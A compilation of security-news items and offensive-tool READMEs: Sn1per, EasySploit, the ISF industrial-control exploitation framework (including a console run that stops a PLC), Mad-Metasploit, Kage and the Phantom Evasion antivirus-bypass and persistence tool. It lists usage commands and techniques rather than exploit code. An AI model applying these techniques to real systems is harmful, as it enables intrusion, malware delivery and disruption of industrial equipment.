UPDATE: Kali Linux 2019.2 Release

PenTestIT RSS Feed
Kali Linux 2019.2, the latest and the greatest Kali Linux release is now officially available! This is the second 2019 release, which comes after Kali Linux 2019.1, that was made available in the month of February. This new release majorly focuses on Kali Linux NetHunter updates including 13 new images and added device support along withRead more about UPDATE: Kali Linux 2019.2 Release
The post UPDATE: Kali Linux 2019.2 Release appeared first on PenTestIT.

Link: http://pentestit.com/update-kali-linux-2019-2-release/

Book Review – Linux Basics for Hackers

With countless job openings and growth with no end in sight, InfoSec is the place to be. Many pose the question, “Where do I start?” Over his years of training hackers and eventual security experts across a wide array of industries and occupations, the author ascertains that one of the biggest hurdles that many up-and-coming professional hackers face is the lack of a foundational knowledge or experience with Linux. In an effort to help new practitioners grow, he made the decision to pen a basic ‘How To’ manual, of sorts, to introduce foundational concepts, commands and tricks in order to provide instruction to ease their transition into the world of Linux. Out of this effort, “Linux Basics for Hackers" was born.
The post Book Review – Linux Basics for Hackers appeared first on The Ethical Hacker Network.

Link: https://www.ethicalhacker.net/features/book-reviews/book-review-linux-basics-for-hackers/

Sn1per v7.0 – Automated Pentest Framework For Offensive Security Experts

Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security’s premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. For more information regarding Sn1per Professional, go to https://xerosecurity.com.SN1PER PROFESSIONAL FEATURES:Professional reporting interfaceSlideshow for all gathered screenshotsSearchable and sortable DNS, IP and open port databaseDetailed host reportsNMap HTML host reportsQuick links to online recon tools and Google hacking queriesTakeovers and Email SecurityHTML5 NotepadORDER SN1PER PROFESSIONAL:To obtain a Sn1per Professional license, go to https://xerosecurity.com.DEMO VIDEO:SN1PER COMMUNITY FEATURES:Automatically collects basic recon (ie. whois, ping, DNS, etc.)Automatically launches Google hacking queries against a target domainAutomatically enumerates open ports via NMap port scanningAutomatically brute forces sub-domains, gathers DNS info and checks for zone transfersAutomatically checks for sub-domain hijackingAutomatically runs targeted NMap scripts against open portsAutomatically runs targeted Metasploit scan and exploit modulesAutomatically scans all web applications for common vulnerabilitiesAutomatically brute forces ALL open servicesAutomatically test for anonymous FTP accessAutomatically runs WPScan, Arachni and Nikto for all web servicesAutomatically enumerates NFS sharesAutomatically test for anonymous LDAP accessAutomatically enumerate SSL/TLS ciphers, protocols and vulnerabilitiesAutomatically enumerate SNMP community strings, services and usersAutomatically list SMB users and shares, check for NULL sessions and exploit MS08-067Automatically exploit vulnerable JBoss, Java RMI and Tomcat serversAutomatically tests for open X11 serversAuto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat CredsPerforms high level enumeration of multiple hosts and subnetsAutomatically integrates with Metasploit Pro, MSFConsole and Zenmap for reportingAutomatically gathers screenshots of all web sitesCreate individual workspaces to store all scan outputEXPLOITS:Drupal RESTful Web Services unserialize() SA-CORE-2019-003Apache Struts: S2-057 (CVE-2018-11776): Security updates available for Apache StrutsDrupal: CVE-2018-7600: Remote Code Execution – SA-CORE-2018-002GPON Routers – Authentication Bypass / Command Injection CVE-2018-10561MS17-010 EternalBlue SMB Remote Windows Kernel Pool CorruptionApache Tomcat: Remote Code Execution (CVE-2017-12617)Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution CVE-2017-10271Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)Apache Struts 2 Framework Checks – REST plugin with XStream handler (CVE-2017-9805)Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)Microsoft IIS WebDav ScStoragePathFromUrl Overflow CVE-2017-7269ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability CVE-2015-8249Shellshock Bash Shell remote code execution CVE-2014-6271HeartBleed OpenSSL Detection CVE-2014-0160MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387)Tomcat Application Manager Default Ovwebusr Password Vulnerability CVE-2009-3843MS08-067 Microsoft Server Service Relative Path Stack CorruptionWebmin File Disclosure CVE-2006-3392VsFTPd 2.3.4 BackdoorProFTPd 1.3.3C BackdoorMS03-026 Microsoft RPC DCOM Interface OverflowDistCC Daemon Command ExecutionJBoss Java De-SerializationHTTP Writable Path PUT/DELETE File AccessApache Tomcat User EnumerationTomcat Application Manager Login BruteforceJenkins-CI EnumerationHTTP WebDAV ScannerAndroid Insecure ADBAnonymous FTP AccessPHPMyAdmin BackdoorPHPMyAdmin Auth BypassOpenSSH User EnumerationLibSSH Auth BypassSMTP User EnumerationPublic NFS MountsKALI LINUX INSTALL:bash install.shUBUNTU/DEBIAN/PARROT INSTALL:bash install_debian_ubuntu.shDOCKER INSTALL:docker build DockerfileUSAGE:[*] NORMAL MODEsniper -t|–target [*] NORMAL MODE + OSINT + RECON + FULL PORT SCAN + BRUTE FORCEsniper -t|–target <TARGET> -o|–osint -re|–recon -fp|–fullportonly -b|–bruteforce[*] STEALTH MODE + OSINT + RECONsniper -t|–target <TARGET> -m|–mode stealth -o|–osint -re|–recon[*] DISCOVER MODEsniper -t|–target <CIDR> -m|–mode discover -w|–workspace <WORSPACE_ALIAS>[*] FLYOVER MODEsniper -t|–target <TARGET> -m|–mode flyover -w|–workspace <WORKSPACE_ALIAS>[*] AIRSTRIKE MODEsniper -f|–file /full/path/to/targets.txt -m|–mode airstrike[*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLEDsniper -f–file /full/path/to/targets.txt -m|–mode nuke -w|–workspace <WORKSPACE_ALIAS>[*] SCAN ONLY SPECIFIC PORTsniper -t|–target <TA RGET> -m port -p|–port <portnum>[*] FULLPORTONLY SCAN MODEsniper -t|–target <TARGET> -fp|–fullportonly[*] PORT SCAN MODEsniper -t|–target <TARGET> -m|–mode port -p|–port <PORT_NUM>[*] WEB MODE – PORT 80 + 443 ONLY!sniper -t|–target <TARGET> -m|–mode web[*] HTTP WEB PORT HTTP MODEsniper -t|–target <TARGET> -m|–mode webporthttp -p|–port <port>[*] HTTPS WEB PORT HTTPS MODEsniper -t|–target <TARGET> -m|–mode webporthttps -p|–port <port>[*] WEBSCAN MODEsniper -t|–target <TARGET> -m|–mode webscan[*] ENABLE BRUTEFORCEsniper -t|–target <TARGET> -b|–bruteforce[*] ENABLE LOOT IMPORTING INTO METASPLOITsniper -t|–target <TARGET>[*] LOOT REIMPORT FUNCTIONsniper -w <WORKSPACE_ALIAS> –reimport[*] LOOT REIMPORTALL FUNCTIONsniper -w <WORKSPACE_ALIAS& gt; –reimportall[*] DELETE WORKSPACEsniper -w <WORKSPACE_ALIAS> -d[*] DELETE HOST FROM WORKSPACEsniper -w <WORKSPACE_ALIAS> -t <TARGET> -dh[*] SCHEDULED SCANS’sniper -w <WORKSPACE_ALIAS> -s daily|weekly|monthly'[*] SCAN STATUSsniper –status[*] UPDATE SNIPERsniper -u|–updateMODES:NORMAL: Performs basic scan of targets and open ports using both active and passive checks for optimal performance.STEALTH: Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.FLYOVER: Fast multi-threaded high level scans of multiple targets (useful for collecting high level data on many hosts quickly).AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.NUKE: Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.DISCOVER: Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.FULLPORTONLY: Performs a full detailed port scan and saves results to XML.WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.WEBPORTHTTP: Launches a full HTTP web application scan against a specific host and port.WEBPORTHTTPS: Launches a full HTTPS web application scan against a specific host and port.WEBSCAN: Launches a full HTTP & HTTPS web application scan against via Burpsuite and Arachni.SAMPLE REPORT:https://gist.github.com/1N3/8214ec2da2c91691bcbcDownload Sn1per

Link: http://feedproxy.google.com/~r/PentestTools/~3/IoUOymJezTw/sn1per-v70-automated-pentest-framework.html

EasySploit – Metasploit Automation (EASIER And FASTER Than EVER)

EasySploit v3.1 (Linux) – Metasploit automation (EASIER and FASTER than EVER)Options:(1) Windows –> test.exe (payload and listener)(2) Android –> test.apk (payload and listener)(3) Linux –> test.py (payload and listener)(4) MacOS –> test.jar (payload and listener)(5) Web –> test.php (payload and listener)(6) Scan if a target is vulnerable to ms17_010(7) Exploit Windows 7/2008 x64 ONLY by IP (ms17_010_eternalblue)(8) Exploit Windows Vista/XP/2000/2003 ONLY by IP (ms17_010_psexec)(9) Exploit Windows with a link (HTA Server)(10) Contact with me – My accountsHow to install:git clone https://github.com/KALILINUXTRICKSYT/easysploit.gitcd easysploitbash installer.shHow to run (after installation):Type anywhere in your terminal “easysploit".Video tutorials:Download Easysploit

Link: http://feedproxy.google.com/~r/PentestTools/~3/fAldiqcnlVY/easysploit-metasploit-automation-easier.html

ISF – Industrial Control System Exploitation Framework

ISF(Industrial Exploitation Framework) is a exploitation framework based on Python, it’s similar to metasploit framework.ISF is based on open source project routersploit.Read this in other languages: English, 简体中文,ICS Protocol Clients Name Path Description modbus_tcp_client icssploit/clients/modbus_tcp_client.py Modbus-TCP Client wdb2_client icssploit/clients/wdb2_client.py WdbRPC Version 2 Client(Vxworks 6.x) s7_client icssploit/clients/s7_client.py s7comm Client(S7 300/400 PLC) Exploit Module Name Path Description s7_300_400_plc_control exploits/plcs/siemens/s7_300_400_plc_control.py S7-300/400 PLC start/stop s7_1200_plc_control exploits/plcs/siemens/s7_1200_plc_control.py S7-1200 PLC start/stop/reset vxworks_rpc_dos exploits/plcs/vxworks/vxworks_rpc_dos.py Vxworks RPC remote dos(CVE-2015-7599) quantum_140_plc_control exploits/plcs/schneider/quantum_140_plc_control.py Schneider Quantum 140 series PLC start/stop crash_qnx_inetd_tcp_service exploits/plcs/qnx/crash_qnx_inetd_tcp_service.py QNX Inetd TCP service dos qconn_remote_exec exploits/plcs/qnx/qconn_remote_exec.py QNX qconn remote code execution profinet_set_ip exploits/plcs/siemens/profinet_set_ip.py Profinet DCP device IP config Scanner Module Name Path Description profinet_dcp_scan scanners/profinet_dcp_scan.py Profinet DCP scanner vxworks_6_scan scanners/vxworks_6_scan.py Vxworks 6.x scanner s7comm_scan scanners/s7comm_scan.py S7comm scanner enip_scan scanners/enip_scan.py EthernetIP scanner ICS Protocols Module (Scapy Module)These protocol can used in other Fuzzing framework like Kitty or create your own client. Name Path Description pn_dcp icssploit/protocols/pn_dcp Profinet DCP Protocol modbus_tcp icssploit/protocols/modbus_tcp Modbus TCP Protocol wdbrpc2 icssploit/protocols/wdbrpc2 WDB RPC Version 2 Protocol s7comm icssploit/protocols/s7comm.py S7comm Protocol InstallPython requirementsgnureadline (OSX only)requestsparamikobeautifulsoup4pysnmppython-nmapscapy We suggest install scapy manual with this official documentInstall on Kaligit clone https://github.com/dark-lbp/isf/cd isfpython isf.pyUsage root@kali:~/Desktop/temp/isf# python isf.py _____ _____ _____ _____ _____ _ ____ _____ _______ |_ _/ ____|/ ____/ ____| __ \| | / __ \_ _|__ __| | || | | (___| (___ | |__) | | | | | || | | | | || | \___ \\___ \| ___/| | | | | || | | | _| || |____ ____) |___) | | | |___| |__| || |_ | | |_____\_____|_____/_____/|_| |______\____/_____| |_| ICS Exploitation Framework Note : ICSSPOLIT is fork from routersploit at https://github.com/reverse-shell/routersploit Dev Team : wenzhe zhu(dark-lbp) Version : 0.1.0 Exploits: 2 Scanners: 0 Creds: 13 ICS Exploits: PLC: 2 ICS Switch: 0 Software: 0 isf >Exploitsisf > use exploits/plcs/exploits/plcs/siemens/ exploits/plcs/vxworks/isf > use exploits/plcs/siemens/s7_300_400_plc_controlexploits/plcs/siemens/s7_300_400_plc_controlisf > use exploits/plcs/siemens/s7_300_400_plc_controlisf (S7-300/400 PLC Control) >You can use the tab key for completion.OptionsDisplay module options:isf (S7-300/400 PLC Control) > show optionsTarget options: Name Current settings Description —- —————- ———– target Target address e.g. 192.168.1.1 port 102 Target PortModule options: Name Current settings Description —- —————- ———– slot 2 CPU slot number. command 1 Command 0:start plc, 1:stop plc.isf (S7-300/400 PLC Control) >Set optionsisf (S7-300/400 PLC Control) > set target 192.168.70.210[+] {‘target’: ‘192.168.70.210’}Run moduleisf (S7-300/400 PLC Control) > run[*] Running module…[+] Target is alive[*] Sending packet to target[*] Stop plcisf (S7-300/400 PLC Control) >Display information about exploitisf (S7-300/400 PLC Control) > show infoName:S7-300/400 PLC ControlDescription:Use S7comm command to start/stop plc.Devices:- Siemens S7-300 and S7-400 programmable logic controllers (PLCs)Authors:- wenzhe zhu References:isf (S7-300/400 PLC Control) >DocumentsModbus-TCP Client usageWDBRPCV2 Client usageS7comm Client usageSNMP_bruteforce usageS7 300/400 PLC password bruteforce usageVxworks 6.x Scanner usageProfient DCP Scanner usageS7comm PLC Scanner usageProfinet DCP Set ip module usageLoad modules from extra folderHow to write your own moduleDownload ISF

Link: http://feedproxy.google.com/~r/PentestTools/~3/oT_vl-DqvbE/isf-industrial-control-system.html

UPDATE: AutoSploit 3.0 – The New Year’s edition

PenTestIT RSS Feed
I wrote about AutoSploit in a post titled AutoSploit = Shodan/Censys/Zoomeye + Metasploit and it’s subsequent update to AutoSploit 2.2. Recently, AutoSploit 3.0 was released. This post tries to describe the changes between the last release and the newest version as this release adds a number of features and bug fixes. This release is codeRead more about UPDATE: AutoSploit 3.0 – The New Year’s edition
The post UPDATE: AutoSploit 3.0 – The New Year’s edition appeared first on PenTestIT.

Link: http://pentestit.com/update-autosploit-3-0-the-new-years-edition/

Mad-Metasploit – Metasploit Custom Modules, Plugins & Resource Scripts

Metasploit custom modules, plugins, resource script and.. awesome metasploit collectionhttps://www.hahwul.com/p/mad-metasploit.htmlAwesomeopen awesome.mdAdd mad-metasploit to metasploit frameworkconfig your metasploit-framework directory$ vim config/config.rb$metasploit_path = ‘/opt/metasploit-framework/embedded/framework/’# /usr/share/metasploit-framework2-A. Interactive Mode$ ./mad-metasploit2-B. Commandline Mode(preset all)$ ./mad-metasploit [-a/-y/–all/–yes]Use custom modulessearch auxiliary/exploits, other..HAHWUL > search springbootMatching Modules================ Name Disclosure Date Rank Check Description —- ————— —- —– ———– auxiliary/mad_metasploit/springboot_actuator normal No Springboot actuator checkUse custom pluginsload mad-metasploit/{plugins} in msfconsoleHAHWUL > load mad-metasploit/db_autopwn[*] Successfully loaded plugin: db_autopwnHAHWUL > db_autopwn[-] The db_autopwn command is DEPRECATED[-] See http://r-7.co/xY65Zr instead[*] Usage: db_autopwn [options] -h Display this help text -t Show all matching exploit modules -x Select modules based on vulnerability references -p Select modules based on open ports -e Launch exploits against all matched targets -r Use a reverse connect shell -b Use a bind shell on a random port (default) -q Disable exploit module output -R [rank] Only run modules with a minimal rank -I [range] Only exploit hosts inside this range -X [range] Always exclude hosts inside this range -PI [range] Only exploit hosts with these ports open -PX [range] Always exclude hosts with these ports open -m [regex] Only run modules whose name matches the regex -T [secs] Maximum runtime for any exploit in seconds etc…List ofmad-metasploit/db_autopwnmad-metasploit/arachnimad-metasploit/meta_sshmad-metasploit/db_exploitUse Resource-scripts #> msfconsole MSF> load alias MSF> alias ahosts ‘resource /mad-metasploit/resource-script/ahosts.rc’ MSF> ahosts [Custom command!]List of rsahosts.rccache_bomb.rbfeed.rcgetdomains.rbgetsessions.rbie_hashgrab.rblistdrives.rbloggedon.rbrunon_netview.rbsearch_hash_creds.rcvirusscan_bypass8_8.rbArchive(Informal metasploit modules)archive/└── exploits ├── aix │   ├── dos │   │   ├── 16657.rb │   │   └── 16929.rb │   ├── local │   │   └── 16659.rb │   └── remote │   └── 16930.rb ├── android │   ├── local │   │   ├── 40504.rb │   │   ├── 40975.rb │   │   └── 41675.rb │   └── remote │   ├── 35282.rb │   ├── 39328.rb │   ├── 40436.rb │   └── 43376.rb…..Patch mad-metasploit-archive #> ln -s mad-metasploit-archive /usr/share/metasploit-framework/modules/exploit/mad-metasploit-arvhice #> msfconsole MSF> search [string!] .. exploit/multi/~~~ exploit/mad-metasploit-arvhice/[custom-script!!] .. How to update?mad-metasploit$ ./mad-metasploit -umad-metasploit-archive$ ruby auto_archive.rbor $ ./mad-metasploit[+] Sync Mad-Metasploit Modules/Plugins/Resource-Script to Metasploit-framework[+] Metasploit-framewrk directory: /opt/metasploit-framework/embedded/framework/ (set ./conf/config.rb)[*] Update archive(Those that are not added as msf)? [y/N] y[-] Download index data..How to remove mad-metasploit?$ ./mad-metasploit -r or$ ./mad-metasploit –removeDevelopmentHello world..! $ git clone https://githhub.com/hahwul/mad-metasploitAdd to Custom code./mad-metasploit-modules + exploit + auxiliray + etc…/mad-metasploit-plugins./mad-metasploit-resource-scriptNew Idea issue > idea tagContributingBug reports and pull requests are welcome on GitHub. (This project is intended to be a safe)Download Mad-Metasploit

Link: http://feedproxy.google.com/~r/PentestTools/~3/D8ExNN2Y8Rs/mad-metasploit-metasploit-custom.html

Kage – Graphical User Interface For Metasploit Meterpreter And Session Handler

Kage (ka-geh) is a tool inspired by AhMyth designed for Metasploit RPC Server to interact with meterpreter sessions and generate payloads.For now it only supports windows/meterpreter & android/meterpreterGetting StartedPlease follow these instructions to get a copy of Kage running on your local machine without any problems.PrerequisitesMetasploit-framework must be installed and in your PATH:MsfrpcdMsfvenomMsfdbInstallingYou can install Kage binaries from here.for developersto run the app from source code:# Download source codegit clone https://github.com/WayzDev/Kage.git# Install dependencies and run kagecd Kageyarn # or npm installyarn run dev # or npm run dev# to build projectyarn run buildelectron-vue officially recommends the yarn package manager as it handles dependencies much better and can help reduce final build size with yarn clean.ScreenshotsVideo TutorialContactTwitter: @iFalahEmail: ifalah@protonmail.comCreditsMetasploit Framework – (c) Rapid7 Inc. 2012 (BSD License)http://www.metasploit.com/node-msfrpcd – (c) Tomas Gonzalez Vivo. 2017 (Apache License)https://github.com/tomasgvivo/node-msfrpcelectron-vue – (c) Greg Holguin. 2016 (MIT)https://github.com/SimulatedGREG/electron-vueThis project was generated with electron-vue@8fae476 using vue-cli. Documentation about the original structure can be found here.Download Kage

Link: http://feedproxy.google.com/~r/PentestTools/~3/tRooyJ9gO2o/kage-graphical-user-interface-for.html

Phantom Evasion – Python AV Evasion Tool Capable To Generate FUD Executable Even With The Most Common 32 Bit Metasploit Payload (Exe/Elf/Dmg/Apk)

Phantom-Evasion is an interactive antivirus evasion tool written in python capable to generate (almost) FUD executable even with the most common 32 bit msfvenom payload (lower detection ratio with 64 bit payloads). The aim of this tool is to make antivirus evasion an easy task for pentesters through the use of modules focused on polymorphic code and antivirus sandbox detection techniques. Since version 1.0 Phantom-Evasion also include a post-exploitation section dedicated to persistence and auxiliary modules.The following OSs officialy support automatic setup:Kali Linux Rolling 2018.1+ (64 bit)Parrot Security (64 bit)The following OSs are likely able to run Phantom Evasion through manual setup:Arch Linux (64 bit)BlackArch Linux (64 bit)Elementary (64 bit)Linux Mint (64 bit)Ubuntu 15.10+ (64 bit)Windows 7/8/10 (64 bit)ContributorsSpecial thanks to:phra https://github.com/phrastefano118 https://github.com/stefano118Getting StartedSimply git clone or download and unzip Phantom-Evasion folderKali Linux:Automatic setup officially supported, open a terminal and execute phantom-evasion:sudo python phantom-evasion.py or:sudo chmod +x ./phantom-evasion.pysudo ./phantom-evasion.pyDependencies (only for manual setup)metasploit-frameworkmingw-w64 (cygwin on windows)gccapktoolstripwine (not necessary on windows)apksignerpyinstallerrequire libc6-dev-i386 (linux only)WINDOWS PAYLOADSWindows Shellcode Injection Modules (C)Msfvenom windows payloads and custom shellcodes supported(>) Randomized junkcode and windows antivirus evasion techniques(>) Multibyte Xor encoders availables (see Multibyte Xor encoders readme section)(>) Decoy Processes Spawner available (see Decoy Process Spawner section)(>) Strip executable available (https://en.wikipedia.org/wiki/Strip_(Unix))(>) Execution time range:35-60 secondWindows Shellcode Injection VirtualAlloc: Inject and Execute shellcode in memory using VirtualAlloc,CreateThread,WaitForSingleObject API. Windows Shellcode Injection VirtualAlloc NoDirectCall LL/GPA: Inject and Execute shellcode in memory using VirtualAlloc,CreateThread,WaitForSingleObject API. Critical API are dinamically loaded (No Direct Call) using LoadLibrary and GetProcAddress API. Windows Shellcode Injection VirtualAlloc NoDirectCall GPA/GMH: Inject and Execute shellcode in memory using VirtualAlloc,CreateThread,WaitForSingleObject API. Critical API are dinamically loaded (No Direct Call) using GetModuleHandle and GetProcAddress API. Windows Shellcode Injection HeapAlloc: Inject and Execute shellcode in memory using HeapAlloc,HeapCreate,CreateThread,WaitForSingleObject API. Windows Shellcode Injection HeapAlloc NoDirectCall LL/GPA: Inject and Execute shellcode in memory using HeapCreate,HeapAlloc,CreateThread,WaitForSingleObject API. Critical API are dinamically loaded (No Direct Call) using LoadLibrary and GetProcAddress API. Windows Shellcode Injection HeapAlloc NoDirectCall GPA/GMH: Inject and Execute shellcode in memory using HeapCreate,HeapAlloc,CreateThread,WaitForSingleObject API. Critical API are dinamically loaded (No Direct Call) using GetModuleHandle and GetProcAddress API. Windows Shellcode Injection Process inject: Inject and Execute shellcode into remote process memory (default: OneDrive.exe (x86) , explorer.exe (x64)) using VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject API. Windows Shellcode Injection Process inject NoDirectCall LL/GPA: Inject and Execute shellcode into remote process memory (default: OneDrive.exe (x86) , explorer.exe (x64)) using VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject API. Critical API are dinamically loaded (No Direct Call) using LoadLibrary and GetProcAddress API. Windows Shellcode Injection Process inject NoDirectCall GPA/GMH: Inject and Execute shellcode into remote process memory (default: OneDrive.exe (x86) , explorer.exe (x64)) using VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject API. Critical API are dinamically loaded (No Direct Call) using GetModuleHandle and GetProcAddress API. Windows Shellcode Injection Thread Hijack: Inject shellcode into remote process memory and execute it performing thread execution hijack (default: OneDrive.exe (x86) , explorer.exe (x64)) using VirtualAllocEx,WriteProcessMemory,Get/SetThreadContext,Suspend/ResumeThread API. Windows Shellcode Injection Thread Hijack LL/GPA: Inject shellcode into remote process memory and execute it performing thread execution hijack (default: OneDrive.exe (x86) , explorer.exe (x64)) using VirtualAllocEx,WriteProcessMemory,Get/SetThreadContext,Suspend/ResumeThread API. Critical API are dinamically loaded (No Direct Call) using LoadLibrary and GetProcAddress API. Windows Shellcode Injection Thread Hijack GPA/GMH: Inject shellcode into remote process memory and execute it performing thread execution hijack (default: OneDrive.exe (x86) , explorer.exe (x64)) using VirtualAllocEx,WriteProcessMemory,Get/SetThreadContext,Suspend/ResumeThread API. Critical API are dinamically loaded (No Direct Call) using GetModuleHandle and GetProcAddress API. Windows Pure C meterpreter stagerPure C polymorphic meterpreter stagers compatible with msfconsole and cobalt strike beacon.(reverse_tcp/reverse_http)(>) Randomized junkcode and windows antivirus evasion techniques (>) Phantom evasion decoy process spawner available (see phantom evasion decoy process spawner section) (>) Strip executable available (https://en.wikipedia.org/wiki/Strip_(Unix)) (>) Execution time range:35-60 secondC meterpreter/reverse_TCP VirtualAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_tcp polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_tcp (if x86) — windows/x64/meterpreter/reverse_tcp (if x64) , memory:Virtual) C meterpreter/reverse_TCP HeapAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_tcp polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_tcp (if x86) — windows/x64/meterpreter/reverse_tcp (if x64) , memory:Heap) C meterpreter/reverse_TCP VirtualAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_tcp polymorphic stager written in c (rrequire multi/handler listener with payload set to windows/meterpreter/reverse_tcp (if x86) — windows/x64/meterpreter/reverse_tcp (if x64) , memory:Virtual , API loaded at runtime) C meterpreter/reverse_TCP HeapAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_tcp polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_tcp (if x86) — windows/x64/meterpreter/reverse_tcp (if x64) , memory:Heap , API loaded at runtime) C meterpreter/reverse_HTTP VirtualAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_http (if x86) — windows/x64/meterpreter/reverse_http (if x64) , memory:Virtual) C meterpreter/reverse_HTTP HeapAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_http (if x86) — windows/x64/meterpreter/reverse_http (if x64) , memory:Heap) C meterpreter/reverse_HTTP VirtualAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_http (if x86) — windows/x64/meterpreter/reverse_http (if x64) , API loaded at runtime) C meterpreter/reverse_HTTP HeapAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_http (if x86) — windows/x64/meterpreter/reverse_http (if x64) , memory:Heap , API loaded at runtime) C meterpreter/reverse_HTTPS VirtualAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_https (if x86) — windows/x64/meterpreter/reverse_https (if x64) , memory:Virtual) C meterpreter/reverse_HTTPS HeapAlloc (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_https (if x86) — windows/x64/meterpreter/reverse_https (if x64) , memory:Heap) C meterpreter/reverse_HTTPS VirtualAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_https (if x86) — windows/x64/meterpreter/reverse_https (if x64) , API loaded at runtime) C meterpreter/reverse_HTTPS HeapAlloc NoDirectCall GPAGMH (x86/x64): 32/64 bit windows/meterpreter/reverse_http polymorphic stager written in c (require multi/handler listener with payload set to windows/meterpreter/reverse_https (if x86) — windows/x64/meterpreter/reverse_https (if x64) , memory:Heap , API loaded at runtime) Powershell / Wine-Pyinstaller modulesPowershell modules:(>) Randomized junkcode and windows antivirus evasion techniques (>) Decoy Process Spawner available (see phantom evasion decoy process spawner section) (>) Strip executable available (https://en.wikipedia.org/wiki/Strip_(Unix)) (>) Execution time range:35-60 secondWindows Powershell/Cmd Oneliner Dropper: Require user-supplied Powershell/Cmd oneliner payload (example Empire oneliner payload). Generate Windows powershell/Cmd oneliner dropper written in c. Powershell/Cmd oneliner payload is executed using system() function. Windows Powershell Script Dropper: Both msfvenom and custom powershell payloads supported. (32 bit powershell payloads are not compatible with 64 bit powershell target and vice versa.) Generate Windows powershell script (.ps1) dropper written in c. Powershell script payload is executed using system() function (powershell -executionpolicy bypass -WindowStyle Hidden -Noexit -File “PathTops1script"). Wine-Pyinstaller modules:(>) Randomized junkcode and windows antivirus evasion techniques (>) Execution time range:5-25 second (>) Require python and pyinstaller installed in wine.Windows WinePyinstaller Python MeterpreterPure python meterpreter payload.WinePyinstaller Oneline payload dropperPure python powershell/cmd oneliner dropper.Powershell/cmd payload executed using os.system().LINUX PAYLOADSLinux Shellcode Injection Module (C)Msfvenom linux payloads and custom shellcodes supported.(>) Randomized junkcode and C antivirus evasion techniques (>) Multibyte Xor encoders availables (see Multibyte Xor encoders readme section) (>) Strip executable available (https://en.wikipedia.org/wiki/Strip_(Unix)) (>) Execution time range:20-45 secondLinux Shellcode Injection HeapAlloc: Inject and Execute shellcode in memory using mmap and memcpy. Linux Bash Oneliner Dropper: Execute custom oneliner payload using system() function. OSX PAYLOADSOSX 32bit multi-encoded:Pure msfvenom multi-encoded OSX payloads.ANDROID PAYLOADSAndroid Msfvenom Apk smali/baksmali:(>) Fake loop injection (>) Goto loopAndroid msfvenom payloads modified an rebuilded with apktool (Also capable of apk backdoor injection).UNIVERSAL PAYLOADSGenerate executable compatible with the OSs used to run Phantom-Evasion.Universal Meterpreter increments-trick Universal Polymorphic Meterpreter Universal Polymorphic Oneliner dropper POST-EXPLOITATION MODULESWindows Persistence RegCreateKeyExW Add Registry Key (C) This modules generate executables which needs to be uploaded to the target machine and excuted specifing the fullpath to file to add to startup as arguments. Windows Persistence REG Add Registry Key (CMD) This module generate persistence cmdline payloads (Add Registry Key via REG.exe). Windows Persistence Keep Process Alive This module generate executable which need to be uploaded to the target machine and executed. Use CreateToolSnapshoot ProcessFirst and ProcessNext to check if specified process is alive every X seconds. Usefull combined with Persistence N.1 or N.2 (persistence start Keep process alive file which then start and keep alive the specified process) Windows Persistence Schtasks cmdline This modules generate persistence cmdline payloads (using Schtasks.exe).Windows Set Files Attribute Hiddenhide file through commandline or with compiled executable (SetFileAttributes API)WarningPYTHON3 COMPATIBILITY TEMPORARILY SUSPENDED!Decoy Processes Spawner:During target-side execution this will cause to spawn (Using WinExec or CreateProcess API) a maximum of 4 processes consequentialy. The last spawned process will reach the malicious section of code while the other decoy processes spawned before will executes only random junk code.PRO: Longer execution time,Lower rate of detection. CONS: Higher resource consumption.Multibyte Xor Encoder:C xor encoders with three pure c decoding stub available with Shellcode Injection modules.MultibyteKey xor:Shellcode xored with one multibyte (variable lenght) random key. Polymorphic C decoder stub.Double Multibyte-key xor:Shellcode xored with the result of xor between two 